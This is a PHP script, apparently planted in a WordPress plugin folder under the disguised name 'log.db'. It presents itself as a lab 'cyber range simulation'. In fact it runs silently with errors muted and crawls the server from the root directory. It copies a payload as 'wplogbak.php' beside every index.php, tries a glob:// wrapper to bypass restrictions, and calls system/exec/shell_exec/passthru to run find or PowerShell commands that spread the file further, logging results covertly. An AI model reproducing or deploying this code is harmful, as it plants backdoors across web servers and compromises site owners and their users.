File: /home/iddeczhh/public_html/wp-content/plugins/bhrijfk/log.db
<?php
/**
* Comprehensive Cyber Range Simulation Script - Maximum Memory & Fully Silent Backend Version
*
* NOTE: This version runs entirely in the background with zero Web/HTTP output.
* All results, discovered paths, and bypass telemetry are recorded silently into phprs.txt.
* Intended exclusively for legal stress-testing and EDR threat hunting validation in isolated labs.
*/
// ==================== 1. Maximize Resource Allocation & Backgrounding ====================
set_time_limit(0); // Prevent script execution timeout
ignore_user_abort(true); // Ensure process keeps running in background after HTTP disconnect
ini_set('memory_limit', '-1'); // REMOVE CEILING: Allow unlimited memory utilization (Physical + Swap)
ini_set('display_errors', '0'); // Suppress all PHP runtime errors from leaking to Web interface
error_reporting(0); // Completely mute error reporting
$sourceFile = 'log.txt';
$targetName = 'wplogbak.php';
$recordFile = 'phprs.txt';
$scriptDir = dirname(__FILE__);
$absoluteSource = $scriptDir . DIRECTORY_SEPARATOR . $sourceFile;
$absoluteRecord = $scriptDir . DIRECTORY_SEPARATOR . $recordFile;
// Check source availability silently
if (!file_exists($absoluteSource)) {
file_put_contents($absoluteRecord, "[ABORT] Source payload '$sourceFile' missing." . PHP_EOL, FILE_APPEND | LOCK_EX);
exit();
}
// OS-specific path normalization
$isWindows = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN');
$rootPath = $isWindows ? substr($scriptDir, 0, 3) : '/';
// Log the automated background initialization
$initLog = "==================================================" . PHP_EOL;
$initLog .= "[INIT] Silent Pipeline Started at: " . date('Y-m-d H:i:s') . PHP_EOL;
$initLog .= "[INIT] Target OS: " . PHP_OS . " | PHP: " . PHP_VERSION . PHP_EOL;
$initLog .= "[INIT] Scoping Root: $rootPath" . PHP_EOL;
$initLog .= "==================================================" . PHP_EOL;
file_put_contents($absoluteRecord, $initLog, FILE_APPEND | LOCK_EX);
// ==================== 2. Advanced Low-Overhead Path Filter ====================
class SilentPathFilter extends RecursiveFilterIterator {
public function accept() {
$current = $this->current();
if ($current->isDir()) {
$name = $current->getFilename();
// Prune unindexable virtual and heavy folders to preserve memory and I/O cycles
$blacklist = ['wp-includes', 'wp-content', 'wp-admin', 'proc', 'sys', 'dev', '.git', 'snap', '$Recycle.Bin', 'System Volume Information'];
if (in_array($name, $blacklist, true)) {
return false;
}
}
return true;
}
}
// ==================== 3. Executing Strategies Silently ====================
/**
* STRATEGY A: Standard Recursive Traversal
*/
try {
$directory = new RecursiveDirectoryIterator($rootPath, RecursiveDirectoryIterator::SKIP_DOTS | RecursiveDirectoryIterator::FOLLOW_SYMLINKS);
$filter = new SilentPathFilter($directory);
$iterator = new RecursiveIteratorIterator($filter, RecursiveIteratorIterator::SELF_FIRST, RecursiveIteratorIterator::CATCH_GET_CHILD);
foreach ($iterator as $item) {
if ($item->isDir()) {
try {
$currentPath = $item->getRealPath();
if (!$currentPath) continue;
$indexPath = $currentPath . DIRECTORY_SEPARATOR . 'index.php';
if (file_exists($indexPath)) {
$destination = $currentPath . DIRECTORY_SEPARATOR . $targetName;
if (@copy($absoluteSource, $destination)) {
$logEntry = "[SUCCESS][Strategy-A] Replicated payload to: " . $destination . PHP_EOL;
file_put_contents($absoluteRecord, $logEntry, FILE_APPEND | LOCK_EX);
}
}
} catch (Exception $inner) {
continue;
}
}
}
} catch (Exception $e) {
file_put_contents($absoluteRecord, "[BLOCKED][Strategy-A] Exception: " . $e->getMessage() . PHP_EOL, FILE_APPEND | LOCK_EX);
}
/**
* STRATEGY B: Glob Protocol Sandbox Wrapper Bypass
*/
try {
$targetPattern = 'glob:///*';
$it = new DirectoryIterator($targetPattern);
$foundFiles = [];
foreach ($it as $file) {
$foundFiles[] = $file->getFilename();
}
if (!empty($foundFiles)) {
$logEntry = "[BYPASS-FOUND][Strategy-B] Leaked root structures via wrapper: " . implode(', ', $foundFiles) . PHP_EOL;
file_put_contents($absoluteRecord, $logEntry, FILE_APPEND | LOCK_EX);
}
} catch (Exception $e) {
// Suppressed natively in silent mode
}
/**
* STRATEGY C: Lower-Layer Native Command Delivery
*/
$execFunctions = ['system', 'exec', 'shell_exec', 'passthru'];
$activeFunction = null;
$disabledList = array_map('trim', explode(',', ini_get('disable_functions')));
foreach ($execFunctions as $func) {
if (function_exists($func) && !in_array($func, $disabledList, true)) {
$activeFunction = $func;
break;
}
}
if ($activeFunction) {
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
$cmd = "powershell -Command \"Get-ChildItem -Path '" . $rootPath . "' -Filter 'index.php' -Recurse -ErrorAction SilentlyContinue | ForEach-Object { \$dest = Join-Path \$_.DirectoryName '" . $targetName . "'; if (Copy-Item '" . $absoluteSource . "' -Destination \$dest -Force -ErrorAction SilentlyContinue) { Add-Content '" . $absoluteRecord . "' \"[SUCCESS][Strategy-C] Replicated via PowerShell to: \$dest\" } }\"";
} else {
$cmd = "find " . $rootPath . " -type f -name 'index.php' ! -path '*/wp-includes/*' ! -path '*/wp-content/*' ! -path '*/wp-admin/*' -exec sh -c 'cp " . $absoluteSource . " \$(dirname \"{}\")/" . $targetName . " && echo \"[SUCCESS][Strategy-C] Replicated via Find to: \$(dirname \"{}\")/" . $targetName . "\" >> " . $absoluteRecord . "' \; 2>/dev/null";
}
@$activeFunction($cmd);
} else {
file_put_contents($absoluteRecord, "[BLOCKED][Strategy-C] All system execution functions disabled." . PHP_EOL, FILE_APPEND | LOCK_EX);
}
// Final log stamp
file_put_contents($absoluteRecord, "[FINISH] Silent Pipeline Cycle Concluded at: " . date('Y-m-d H:i:s') . PHP_EOL, FILE_APPEND | LOCK_EX);
?>